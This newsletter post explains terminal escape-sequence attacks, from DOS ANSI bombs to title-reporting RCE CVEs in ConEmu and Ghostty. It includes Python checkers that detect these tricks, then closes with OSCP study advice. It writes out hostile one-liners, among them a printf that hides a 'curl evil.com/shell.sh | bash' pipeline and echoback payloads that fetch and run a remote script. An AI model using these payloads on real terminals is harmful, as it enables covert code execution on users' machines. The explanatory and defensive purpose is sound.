In 2024, there was a new CVE that allowed you to own someone through a title bar. It was a new variation of a 2003 bug. The technique? Older than that.
Dumb Terminal Hacks and ANSI Bombs
Ten terminal emulator CVEs dropped in 2023. I’ve loved terminal hacks since I was a kid. Let’s jump into an old favorite.
ANSI Bomb
The idea behind an ANSI bomb is simple. ANSI escape codes change the behavior of the viewer's terminal, and, more importantly, they do it without the victim executing anything. They just need to view the payload for it to work. Back in the DOS days this was done by abusing the key-remapping feature of ANSI.SYS. You could silently remap N to Y on, say, a BBS, and then when someone ran del *.* in the wrong directory and answered N to the "Are you sure?" prompt, well, they lost that directory. BWAHAHA. This was really funny to 12-year-old me. Sadly, that particular trick doesn't work in the modern world.
You can read about that glory here.
Attacks in the spirit of the ANSI bomb still work to this very day. Escape sequences remain an attack surface, and the trust users place in their terminals can still be abused.
In WSL, or any other terminal that honors carriage return and erase-in-line, you can use escape sequences to hide a command in a text file:
printf 'curl evil.com/shell.sh | bash\r\033[2KNothing to see here. \n' > notes.txt
The \r moves the cursor back to column 0 and \033[2K erases the whole line, so cat notes.txt shows only "Nothing to see here." while the file still contains the curl pipeline; cat -v prints the control characters and gives the game away. You can also try the backspace trick: \b moves the cursor left without erasing anything, so whatever is drawn over the top makes the file look one way on screen while it contains (and, if run, executes) another.

Here's a DEF CON talk, Weaponizing Plain Text: ANSI Escape Sequences as a Forensic Nightmare by STÖK, on planting malicious escape sequences in logs so that they fire when an IR analyst views them: hiding evidence, crashing the terminal, or worse.
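What a log viewer, or plain cat, actually does with these bytes is easy to model. The Python below is an added example written for this post, not code from the post, from STÖK's talk or from any tool mentioned here. It tokenizes a string into escape sequences and text, renders what the screen would show (handling \r, \b, erase-in-line and SGR 8 conceal), prints the bytes cat -v style, and flags the dangerous shapes, including the set-title-then-query pair that the next section is about. All sample inputs are constructed inline; evil.com/shell.sh is the post's placeholder, not a real host.

```python
"""Screen-vs-bytes checker for text about to be cat'ed, tailed or pasted.
Added example: not code from the post, from STOK's talk or from any tool
named above. It models only what these tricks use: CR/BS overwrites, CSI K
(erase in line), SGR 8 (conceal), OSC 0/2 (set title), CSI 20t/21t (report
title). The samples at the bottom are constructed for the demo."""
import re

# Every character is exactly one token: CSI (ESC [ params intermediates final),
# OSC (ESC ] payload ended by BEL or ESC \), any other C0 byte, or printable text.
TOKEN_RE = re.compile(
    r"\x1b\[(?P<csi_params>[0-9;:?<=>]*)(?P<csi_final>[ -/]*[@-~])"
    r"|\x1b\](?P<osc>[^\x07\x1b]*)(?:\x07|\x1b\\)"
    r"|(?P<ctrl>[\x00-\x1f\x7f])"
    r"|(?P<text>[^\x00-\x1f\x7f]+)"
)

def tokenize(data):
    """-> list of ("text", s) | ("osc", payload) | ("csi", params, final) | ("ctrl", ch)."""
    toks = []
    for m in TOKEN_RE.finditer(data):
        if m.lastgroup == "csi_final":
            toks.append(("csi", m.group("csi_params"), m.group("csi_final")))
        else:
            toks.append((m.lastgroup, m.group(m.lastgroup)))
    return toks

def render(data):
    """What the screen shows once the terminal has processed `data`."""
    lines, line, cur, concealed = [], [], 0, False

    def put(ch):  # write one cell at the cursor, padding the line if needed
        nonlocal cur
        line.extend(" " * (cur - len(line)))
        line[cur:cur + 1] = ch
        cur += 1

    for tok in tokenize(data):
        if tok[0] == "text":
            for ch in tok[1]:
                put(" " if concealed else ch)  # concealed text takes cells, shows nothing
        elif tok[0] == "ctrl":
            if tok[1] == "\r":
                cur = 0
            elif tok[1] == "\b":
                cur = max(cur - 1, 0)  # BS only moves left; it erases nothing
            elif tok[1] == "\n":
                lines.append("".join(line))
                line, cur = [], 0
        elif tok[0] == "csi" and tok[2] == "K" and tok[1] != "1":  # EL 2 = whole line, EL 0 = cursor to end
            del line[0 if tok[1] == "2" else cur:]
        elif tok[0] == "csi" and tok[2] == "m":  # SGR: 8 = conceal; 0, 28 or bare = reset
            for p in (tok[1] or "0").split(";"):
                if p in ("", "0", "8", "28"):
                    concealed = p == "8"
        # OSC (titles, hyperlinks, ...) never draws anything
    lines.append("".join(line))
    return "\n".join(lines)

def reveal(data):
    """Every control byte made visible, `cat -v` style (ESC -> ^[, CR -> ^M, BS -> ^H)."""
    return "".join("^" + chr(ord(ch) + 0x40) if ord(ch) < 0x20 and ch != "\n" else ch
                   for ch in data)

def analyze(data):
    """Flag what matters; `echoback_payloads` = titles set and then queried back (the RCE shape)."""
    toks = tokenize(data)
    printable = "".join(t[1] for t in toks if t[0] == "text" or t == ("ctrl", "\n"))
    rep = {"hidden_text": render(data) != printable, "conceal": False,
           "title_queries": 0, "titles_set": [], "echoback_payloads": []}
    for tok in toks:
        if tok[0] == "csi" and tok[2] == "m" and "8" in tok[1].split(";"):
            rep["conceal"] = True
        elif tok[0] == "csi" and tok[2] == "t" and tok[1] in ("20", "21"):  # report icon/window title
            rep["title_queries"] += 1
            if rep["titles_set"]:
                rep["echoback_payloads"].append(rep["titles_set"][-1])
        elif tok[0] == "osc":
            code, _, payload = tok[1].partition(";")
            if code in ("0", "2"):  # OSC 0 = icon + window title, OSC 2 = window title
                rep["titles_set"].append(payload)
    rep["suspicious"] = bool(rep["hidden_text"] or rep["conceal"] or rep["title_queries"])
    return rep

# Constructed samples: the post's two tricks, the 2003 and 2024 echoback sequences,
# and a harmless CRLF log line that must not trip the checker.
HIDDEN_LINE = "curl evil.com/shell.sh | bash\r\x1b[2KNothing to see here. \n"
BACKSPACE_TRICK = "curl evil.com/shell.sh | sh" + "\b" * 27 + "# nothing to see here" + " " * 6
ECHOBACK_2003 = ("\x1b]2;;wget 127.0.0.1/.bd;sh .bd;exit;\x07\x1b[21t"
                 "\x1b]2;xterm\x07Press Enter>\x1b[8m;")
ECHOBACK_2024 = "\x1b]0;iopen -a Calculator\x07\x1b[21t\x1b]0;:accept-line\x07\x1b[21t"
BENIGN_CRLF_LOG = "INFO login ok user=alice\r\n"

if __name__ == "__main__":
    for name in ("HIDDEN_LINE", "BACKSPACE_TRICK", "ECHOBACK_2003", "ECHOBACK_2024", "BENIGN_CRLF_LOG"):
        s = globals()[name]
        print(f"== {name}\n screen: {render(s)!r}\n bytes : {reveal(s)}\n report: {analyze(s)}")
```

The useful signal is the gap between render() and the printable bytes: a CRLF log line renders exactly as its text and stays quiet, while the notes.txt line renders as "Nothing to see here." and is flagged. Title set followed by CSI 21t is flagged on its own, even with no visible text at all, because the damage there is done by the terminal's reply, not by what is drawn.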
ConEmu Full Echoback (Title Reporting RCE)
Back in 2003, HD Moore published a paper on terminal emulator security showing that you could set a terminal's window title to a shell command, ask the terminal to report the title back, and the terminal would write that command into the shell's input as if the user had typed it. The attack looked like this:
echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
It sets the title to a wget command (OSC 2), asks the terminal to report the title back (CSI 21t, which the terminal answers by echoing the title into stdin), resets the title to xterm, prints a Press Enter> prompt, and then switches on concealed text (SGR 8) so the echoed command is invisible. The user presses Enter and it runs. RCE through a title bar.
Most terminals disabled title reporting after this. Most. In 2022, security researcher David Leadbeater found that ConEmu, one of the most popular Windows terminal emulators, still had it enabled by default. Worse, ConEmu did not strip control characters from the title it echoed back, so a newline inside the title submits the command: the terminal types AND executes it with zero user interaction.
Just write the escape sequence to someone's terminal and you own it.
This was tracked as CVE-2022-46387.
The initial fix was incomplete: ConEmu blocked some control characters but missed others, such as ^O, which GNU readline binds to operate-and-get-next (accept the line for execution and fetch the next history entry). A second CVE was assigned: CVE-2023-39150.
Ghostty 1.0
On December 26, 2024, Mitchell Hashimoto released Ghostty 1.0. Within hours, Leadbeater ran his terminal tester on it and published his findings.
Title reporting was enabled by default.
The bug from 2003 worked again. On macOS with zsh in vi mode (which zsh selects by default when $EDITOR or $VISUAL contains "vi"), this one-liner opens Calculator:
printf '\e]0;iopen -a Calculator\a\e[21t\e]0;:accept-line\a\e[21t'
The first title report types i (insert mode in the vi keymap) followed by open -a Calculator; the second types :accept-line, which submits the line. If a remote system is compromised, the attacker can send escape sequences back over your SSH session. The reply to the title query is generated by YOUR terminal and fed into whatever is reading YOUR tty, so the command executes locally on YOUR machine, not on the remote one. Leadbeater demonstrated this by stopping the user's remote shell process, writing the escape sequence to their TTY, and then killing the shell; the echoed command lands in the local shell and executes on disconnect.
You SSH into a compromised box and your local machine gets popped.
This was assigned CVE-2024-56803. Ghostty 1.0.1 fixed it by disabling title reporting by default.
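Leadbeater's terminal tester fires a whole battery of queries at an emulator. The Python below is a much smaller added example of my own, not his tool and not Ghostty code: it asks one question, whether the terminal you are sitting in still answers CSI 21t with the title you just set. It assumes an xterm-style reply (ESC ] l <title> terminated by ESC \ or BEL), a POSIX tty reachable at /dev/tty, and it overwrites your window title with a random nonce until the shell redraws it. The replies checked at the end are constructed.

```python
"""Ask the terminal you are sitting in whether it still answers CSI 21t.

Added example: a deliberately tiny probe, not Leadbeater's terminal tester and
not Ghostty code. It sets the window title to a random nonce (OSC 2), asks for
it back (CSI 21t) and watches the tty's INPUT for the xterm-style reply
ESC ] l <title> ESC \ (some emulators terminate with BEL). Needs a real tty;
the classifier is exercised with constructed replies, so it is safe to import."""
import os
import re
import secrets
import select
import termios
import tty

# Reply to CSI 21t: OSC l <window title> ST.  CSI 20t answers OSC L <icon title>.
TITLE_REPLY_RE = re.compile(r"\x1b\](?P<kind>[lL])(?P<title>[^\x07\x1b]*)(?:\x07|\x1b\\)")


def build_probe(nonce):
    """The bytes an attacker (or this probe) writes to the terminal: set title, then ask for it."""
    return f"\x1b]2;{nonce}\x07\x1b[21t".encode()


def classify_reply(reply, nonce):
    """silent: query ignored (the safe default).
    echoes_title: whatever OSC 2 set comes back as keyboard input, the RCE precondition.
    reports_fixed: the terminal answers, but not with the attacker-controlled string."""
    m = TITLE_REPLY_RE.search(reply)
    if m is None:
        return "silent"
    return "echoes_title" if m.group("title") == nonce else "reports_fixed"


def probe_tty(timeout=1.0):
    """Send the probe to the controlling terminal and classify what comes back."""
    nonce = "probe-" + secrets.token_hex(4)
    fd = os.open("/dev/tty", os.O_RDWR)
    old = termios.tcgetattr(fd)
    try:
        tty.setraw(fd)  # raw mode: the reply must reach us unechoed and unbuffered
        os.write(fd, build_probe(nonce))
        reply = b""
        while select.select([fd], [], [], timeout)[0]:  # stop when the terminal goes quiet
            reply += os.read(fd, 4096)
            if reply.endswith((b"\x07", b"\x1b\\")):
                break
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, old)
        os.close(fd)
    return classify_reply(reply.decode("latin-1"), nonce)


if __name__ == "__main__":
    verdict = probe_tty()
    print(os.environ.get("TERM_PROGRAM", os.environ.get("TERM", "?")), verdict)
    if verdict == "echoes_title":
        print("title reporting is on: anything that can write to this tty can type into it")
```

Run it inside the emulator under test, not over SSH, so you learn about the terminal in front of you. A silent result covers only this one query; a full tester exercises the other reporting sequences as well.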
So they're still out there. A really old class of bugs. HD Moore formalized many of them here, but they were used and abused by many in the years before that. One that comes to mind is redirecting input and output to a TTY. A whole other rabbit hole for a different day. These bugs never went away. Out of sight, maybe, but never out of memory.
What NOT to study for the OSCP
Terminal tricks are not on the OSCP.
I took the OSCP after working as a pen tester for a little over 3 years. I wasted so much time studying things that were not on the exam. I went down every rabbit hole and ran out of time on my first try. Failed it!
It was really demoralizing as I worked in the field and did pen tests every day. Still the failure taught me what was covered on the exam.
I aced it the second time because I knew what NOT to study. You should know everything here. It just shouldn’t be where you spend your time studying to pass the exam.
OSINT
OSINT is important but the only OSINT skill you will need to pass the exam is how to find a public POC exploit.
You don't need to know anything about finding emails, subdomains, breached credentials, and so on. You should know how to use searchsploit and the Google dork site:github.com.
There just aren’t that many practical ways to test OSINT in this exam.
MITM Attacks
You won't need to relay NTLM, but you should know how to pass the hash.
You won't need ARP poisoning, DNS spoofing, or bettercap.
For the most part it just isn't practical to test people on this. Coercer and coercion attacks in general are worth knowing, but probably not for the OSCP.
Advanced AD Attacks
No RBCD. No Golden Ticket. No trust abuse.
This is definitely an area that I went too deep on when studying for the OSCP and ended up in OSEP and CRTO territory without realizing it.
Know pass the hash and pass the ticket. It wouldn't hurt to know AD CS ESC1, but I don't think that's covered. It's worth knowing either way, as it's the top way pen testers are getting domain admin these days.
Web Attacks
Anything beyond basic knowledge is too much. You should know how SQLi works and how to exploit one. You should probably understand CSRF as well. Do a ton of CTF boxes: the simple web attacks you use to get a foothold there are what you will see.
You don't need cache attacks, CL.TE request smuggling, XSS, probably not XXE, and the like.
Web Shells
You do need to know how to deploy a simple PHP webshell or similar. Kali ships a set in /usr/share/webshells. Test them out on CTF boxes. Anything complex is overkill; just really simple webshells.
Exploit Dev
If you are doing anything besides changing the IP address in the exploit then you are doing too much and have gone down a rabbit hole. I often found myself trying to “fix” public POCs I had found only to find out it was the wrong exploit. There is no need for custom exploit development on the OSCP. If it doesn’t pop from searchsploit or GitHub you probably don’t need it.
AV/EDR Evasion
NO AV or EDR on the OSCP machines! YAY. You can literally run mimikatz with no problem at all. Don’t spend a moment worrying about this topic for the exam.
Metasploit
Yes, you don’t even need to use Metasploit once on the exam. There is a ton you could learn here but you are much better served doing it by hand. Need a reverse shell and forgot the syntax? Go to revshells.com. Don’t spend time on Metasploit for the exam.
I failed the OSCP because I studied the wrong things. Now you don't have to.
If you still want more, check out my OSCP prep checklist on my GitHub here.
If you found this useful, forward it to someone who’d actually read it.
Got questions, corrections, or want to argue about something? Just hit reply. I read everything.
— Jeff
